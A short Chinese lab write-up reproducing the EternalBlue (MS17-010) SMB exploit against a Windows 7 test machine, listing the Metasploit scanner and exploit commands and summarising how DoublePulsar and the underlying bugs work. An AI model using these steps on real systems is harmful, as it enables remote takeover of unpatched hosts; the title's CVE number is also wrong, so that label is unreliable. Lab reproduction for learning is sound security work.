[漏洞复现]CVE-2017-17010

环境

攻击机：kali2019.04
靶机：windows 7

攻击机IP：192.168.34.80
靶机IP：192.168.34.81

漏洞复现

虽然17010漏洞复现网上烂大街了，但是自己还是实操一下，做笔记
还是用msfconsole。

使用auxiliary模块分析主机是否存在漏洞

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.34.81
exploit

提示主机可能存在漏洞MS17-010。

使用exploit模块进行攻击

use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.34.81
exploit

成功拿到shell。

漏洞分析

奈何本人技术太菜，只能大概看一下流程

漏洞触发后，执行的代码其实是一段内核shellcode，其最终目的是安装
DoublePulsar后门。DoublePulsar是美国国家安全局NSA泄露工具中一个危害极大
的、无文件型的内核级后门，同时支持SMB和RDP协议。由于其直接在系统内核中
运行，不存在对应的文件，所以很难被主机安全防护软件查杀。
--摘自 http://blog.nsfocus.net/ransomware-detail/ 绿盟博客

EternalBlue达到其攻击事实上利用了3个独立的漏洞：
第一个也就是CVE-2017-0144被用于引发越界内存写；
第二个漏洞则用于绕过内存写的长度限制；
第三个漏洞被用于攻击数据的内存布局。

详情参考：https://blog.csdn.net/r250414958/article/details/84887574